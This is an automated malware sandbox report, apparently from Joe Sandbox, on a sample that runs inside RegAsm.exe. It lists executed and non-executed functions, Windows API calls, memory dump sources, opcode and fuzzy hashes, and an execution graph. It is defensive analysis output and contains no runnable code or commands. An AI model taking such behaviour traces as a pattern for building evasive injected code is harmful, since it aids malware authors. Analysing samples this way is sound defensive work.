                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 46287a6b1f0b00cd878ea6b156604cec57dcdc487a374e50af4d30ab75fa6fd5
                                              • Instruction ID: e96a3a20e91f9784a2389e5e8790af8e83caecc2887021dd85877aea7a6ffd99
                                              • Opcode Fuzzy Hash: 46287a6b1f0b00cd878ea6b156604cec57dcdc487a374e50af4d30ab75fa6fd5
                                              • Instruction Fuzzy Hash: 4841ABB4D052589FCB10CFA9D884AEEFBF1BB49314F20802AE414B7350D778AA45CF55
                                              Function 004F0814 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 219 4f0814-4f878d ResumeThread 222 4f878f-4f8795 219->222 223 4f8796-4f87d0 219->223 222->223
                                              APIs
                                              • ResumeThread.KERNELBASE(00000000), ref: 004F877D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 3e9b5bf59ccb94a4c190c19a70ed0a67eb3002a3d356e9bbffd755efcebcce5b
                                              • Instruction ID: 3b1de3fd5145e75900a0fe0c1f55ff3a4e2a695231112f47810199b8ada9a422
                                              • Opcode Fuzzy Hash: 3e9b5bf59ccb94a4c190c19a70ed0a67eb3002a3d356e9bbffd755efcebcce5b
                                              • Instruction Fuzzy Hash: 8131ADB4D012189FCB10DFA9D884AAEFBF4FB49314F20901AE914B7310D778A905CF59

                                              Non-executed Functions

                                              Function 004F3E35 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: <
                                              • API String ID: 0-4251816714
                                              • Opcode ID: 87fb64901ba90d239a4035c881239f309dae5d5bf47a19d79454cb0a14a0f526
                                              • Instruction ID: 3259099d63b85277115087e9c0d2529c3b658335cb33dd4527d1557606da0049
                                              • Opcode Fuzzy Hash: 87fb64901ba90d239a4035c881239f309dae5d5bf47a19d79454cb0a14a0f526
                                              • Instruction Fuzzy Hash: 7471B470E112298FDBA4CFA9C980B9DBBF1BF89300F1481A6D54CEB255D7349A85CF05
                                              Function 004F0B08 Relevance: .2, Instructions: 152COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9bd347318e85d7dfe1bf3826891145a1ea990172ab066b1b948ba72e73e90f62
                                              • Instruction ID: bc6497f1daa73b1fcce43524adeb242d2eea81dda9473373eb5570f95e2380d0
                                              • Opcode Fuzzy Hash: 9bd347318e85d7dfe1bf3826891145a1ea990172ab066b1b948ba72e73e90f62
                                              • Instruction Fuzzy Hash: 72515EB1E112098FD705DFB9E8A169EBBF6BFC5300F14C86AD114AB365DB705A06CB40
                                              Function 004F0B18 Relevance: .2, Instructions: 152COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56153bb1eca1254c2c8c9451974a90aab22bf5eb9e346ee9286e581d1a342eff
                                              • Instruction ID: 13601855473d24619861bb93fac660cf9768c97199c6dc75f26bb104e976d554
                                              • Opcode Fuzzy Hash: 56153bb1eca1254c2c8c9451974a90aab22bf5eb9e346ee9286e581d1a342eff
                                              • Instruction Fuzzy Hash: 18513DB1D112098FE705DFB9E86169EBBF6BFC5304F10C82AD114AB365EB749A06CB40
                                              Function 004F0EA8 Relevance: .1, Instructions: 111COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383194631.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f0000_temp_file_rhjRS.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 611d4b963071079b1fbe6bf00e5fe2129747c3281ad26d387e2c8980b6f5369a
                                              • Instruction ID: 0b15ca301837be7ce2577808ad09707854b88217432831ee2127def4f1197bcf
                                              • Opcode Fuzzy Hash: 611d4b963071079b1fbe6bf00e5fe2129747c3281ad26d387e2c8980b6f5369a
                                              • Instruction Fuzzy Hash: 9F4111B1E016188BEB6CCF6B8D4079EFAF7AFC8300F54C0BA950CA6255DB7449858F15

                                              Execution Graph

                                              Execution Coverage:1.5%
                                              Dynamic/Decrypted Code Coverage:3.2%
                                              Signature Coverage:5.6%
                                              Total number of Nodes:125
                                              Total number of Limit Nodes:8
                                              execution_graph 76688 220f9f0 LdrInitializeThunk 76566 42f843 76569 42e623 76566->76569 76572 42c8d3 76569->76572 76571 42e63c 76573 42c8ed 76572->76573 76574 42c8fe RtlFreeHeap 76573->76574 76574->76571 76575 424903 76576 42491f 76575->76576 76577 424947 76576->76577 76578 42495b 76576->76578 76579 42c563 NtClose 76577->76579 76585 42c563 76578->76585 76581 424950 76579->76581 76582 424964 76588 42e743 RtlAllocateHeap 76582->76588 76584 42496f 76586 42c57d 76585->76586 76587 42c58e NtClose 76586->76587 76587->76582 76588->76584 76589 42f7e3 76590 42f7f3 76589->76590 76591 42f7f9 76589->76591 76594 42e703 76591->76594 76593 42f81f 76597 42c883 76594->76597 76596 42e71e 76596->76593 76598 42c8a0 76597->76598 76599 42c8b1 RtlAllocateHeap 76598->76599 76599->76596 76689 42bb33 76690 42bb4d 76689->76690 76693 220fdc0 LdrInitializeThunk 76690->76693 76691 42bb75 76693->76691 76699 424c93 76704 424cac 76699->76704 76700 424d3c 76701 424cf7 76702 42e623 RtlFreeHeap 76701->76702 76703 424d07 76702->76703 76704->76700 76704->76701 76705 424d37 76704->76705 76706 42e623 RtlFreeHeap 76705->76706 76706->76700 76600 41b1a3 76601 41b1e7 76600->76601 76602 41b208 76601->76602 76603 42c563 NtClose 76601->76603 76603->76602 76707 41a453 76708 41a46b 76707->76708 76710 41a4c5 76707->76710 76708->76710 76711 41e3c3 76708->76711 76712 41e3e9 76711->76712 76716 41e4e6 76712->76716 76717 42f913 76712->76717 76714 41e484 76715 42bb83 LdrInitializeThunk 76714->76715 76714->76716 76715->76716 76716->76710 76718 42f883 76717->76718 76719 42e703 RtlAllocateHeap 76718->76719 76720 42f8e0 76718->76720 76721 42f8bd 76719->76721 76720->76714 76722 42e623 RtlFreeHeap 76721->76722 76722->76720 76723 413e93 76724 413eac 76723->76724 76725 413f16 76724->76725 76726 413f03 PostThreadMessageW 76724->76726 76726->76725 76604 4019e6 76605 401a06 76604->76605 76608 42fcb3 76605->76608 76611 42e1e3 76608->76611 76612 42e1ff 76611->76612 76623 407203 76612->76623 76614 42e215 76622 401a7a 76614->76622 76626 41afb3 76614->76626 76616 42e234 76619 42e249 76616->76619 76641 42c923 76616->76641 76637 428203 76619->76637 76620 42e263 76621 42c923 ExitProcess 76620->76621 76621->76622 76644 416323 76623->76644 76625 407210 76625->76614 76627 41afdf 76626->76627 76660 41aea3 76627->76660 76630 41b024 76633 41b040 76630->76633 76635 42c563 NtClose 76630->76635 76631 41b00c 76632 41b017 76631->76632 76634 42c563 NtClose 76631->76634 76632->76616 76633->76616 76634->76632 76636 41b036 76635->76636 76636->76616 76638 428264 76637->76638 76640 428271 76638->76640 76671 4184c3 76638->76671 76640->76620 76642 42c93d 76641->76642 76643 42c94e ExitProcess 76642->76643 76643->76619 76645 416340 76644->76645 76647 416359 76645->76647 76648 42cfa3 76645->76648 76647->76625 76650 42cfbd 76648->76650 76649 42cfec 76649->76647 76650->76649 76655 42bb83 76650->76655 76653 42e623 RtlFreeHeap 76654 42d065 76653->76654 76654->76647 76656 42bba0 76655->76656 76659 220fae8 LdrInitializeThunk 76656->76659 76657 42bbcc 76657->76653 76659->76657 76661 41af99 76660->76661 76662 41aebd 76660->76662 76661->76630 76661->76631 76666 42bc23 76662->76666 76665 42c563 NtClose 76665->76661 76667 42bc3d 76666->76667 76670 22107ac LdrInitializeThunk 76667->76670 76668 41af8d 76668->76665 76670->76668 76672 4184ed 76671->76672 76678 4189eb 76672->76678 76679 413b03 76672->76679 76674 41861a 76675 42e623 RtlFreeHeap 76674->76675 76674->76678 76676 418632 76675->76676 76677 42c923 ExitProcess 76676->76677 76676->76678 76677->76678 76678->76640 76683 413b23 76679->76683 76681 413b8c 76681->76674 76682 413b82 76682->76674 76683->76681 76684 41b2c3 RtlFreeHeap LdrInitializeThunk 76683->76684 76684->76682 76685 418c08 76686 42c563 NtClose 76685->76686 76687 418c12 76686->76687

                                              Executed Functions

                                              Function 0042C563 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 74 42c563-42c59c call 404583 call 42d7a3 NtClose
                                              APIs
                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C597
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
                                              • Instruction ID: 1d949b529eabaabdef27e6558712febaa9fe5fb270f3c28a710670586d94b21d
                                              • Opcode Fuzzy Hash: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
                                              • Instruction Fuzzy Hash: 6AE04F766042147BD610FA5ADC01F9B77ACDFC5714F40441AFE0867141C675791186A4
                                              Function 022107AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 88 22107ac-22107c1 LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                              Function 0220FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 85 220fae8-220fafd LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                              Function 0220FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 86 220fb68-220fb7d LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                              Function 0220F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 84 220f9f0-220fa05 LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                              Function 0220FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 87 220fdc0-220fdd5 LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                              Function 00413DB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 5-038439N$5-038439N
                                              • API String ID: 0-2783550038
                                              • Opcode ID: c33db0cfde6465184ed2c3f39b7f3d84eabf24f1cb41c255929c69c68dacf477
                                              • Instruction ID: dd0d4cccc0aa959c07da271ccbbdeff1410fbc39a5be0407eee4a8c6cee06f48
                                              • Opcode Fuzzy Hash: c33db0cfde6465184ed2c3f39b7f3d84eabf24f1cb41c255929c69c68dacf477
                                              • Instruction Fuzzy Hash: 4421CC32D44318AADB219B71CC46FCFBBB8CF41715F40815AF904AB281D2B8174687E8
                                              Function 00413E93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(5-038439N,00000111,00000000,00000000), ref: 00413F10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID: 5-038439N$5-038439N
                                              • API String ID: 1836367815-2783550038
                                              • Opcode ID: a56f400b4b471975c421984d12029f01ae0756d9fdc942b0d83d99d6455c637c
                                              • Instruction ID: c56e7eb7603d3b0094e3843c515e2533f7cd8f2786c0ad3fef1709717dd10e46
                                              • Opcode Fuzzy Hash: a56f400b4b471975c421984d12029f01ae0756d9fdc942b0d83d99d6455c637c
                                              • Instruction Fuzzy Hash: D1010871E4021876EB119A929C42FDF7B7C8F41B14F44805AFA047B281D6B856064BE9
                                              Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 69 42c8d3-42c914 call 404583 call 42d7a3 RtlFreeHeap
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F133F3,00000007,00000000,00000004,00000000,00416EEC,000000F4), ref: 0042C90F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
                                              • Instruction ID: a1d5e44e419c5f43a953c6024c3edd79cc08c06400655d89eb787496dd1df9ae
                                              • Opcode Fuzzy Hash: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
                                              • Instruction Fuzzy Hash: 70E06DB56042047BD610EE59DC41E9B77ACDFC9714F004419FA08A7241CA74B9108BB4
                                              Function 0042C883 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 64 42c883-42c8c7 call 404583 call 42d7a3 RtlAllocateHeap
                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,0041E484,?,?,00000000,?,0041E484,?,?,?), ref: 0042C8C2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
                                              • Instruction ID: b590f83acaf36a29023c807d359efb1fd208aa40abbca26474ac6304e8d45e96
                                              • Opcode Fuzzy Hash: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
                                              • Instruction Fuzzy Hash: 5FE06DB56042047BCA10EE99EC41E9B73ACDFC4714F00441AFA08B7241D674B9108AB4
                                              Function 0042C923 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 79 42c923-42c95c call 404583 call 42d7a3 ExitProcess
                                              APIs
                                              • ExitProcess.KERNELBASE(?,00000000,00000000,?,F2FB61EF,?,?,F2FB61EF), ref: 0042C957
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
                                              • Instruction ID: 974abf2e9af91e9e83b3f33a5918f389266a5b4bdd13027a746a45c35a0aad57
                                              • Opcode Fuzzy Hash: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
                                              • Instruction Fuzzy Hash: 0AE026353102007BD510FA5ADC01F97775CDFC5710F400419FA487B242C671790083F1

                                              Non-executed Functions

                                              Function 02200080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [Pj
                                              • API String ID: 0-2289356113
                                              • Opcode ID: bbbd1110cc5f45339df38c8a63d17307c12cb79e0660e88b6d47776e0b95c197
                                              • Instruction ID: 2996459f9462102f0916fa5add07337e510c468ce7aac956e11a6ca3afb5ab12
                                              • Opcode Fuzzy Hash: bbbd1110cc5f45339df38c8a63d17307c12cb79e0660e88b6d47776e0b95c197
                                              • Instruction Fuzzy Hash: 0BF062312243456BFB22DB90CCC4F2A7BABAF85754F14C459F8455A0DBD7728911DB21
                                              Function 022226F8 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                              • Instruction ID: 07dea98b55efbd275cc4909d9b752e983d5f5b249a0f1716cc274bc41487c229
                                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                              • Instruction Fuzzy Hash: 6CF0FF2133817AEBCB18EE988850ABA33D6EB94304F54C238AD49C721CD6239944C690
                                              Function 02260101 Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
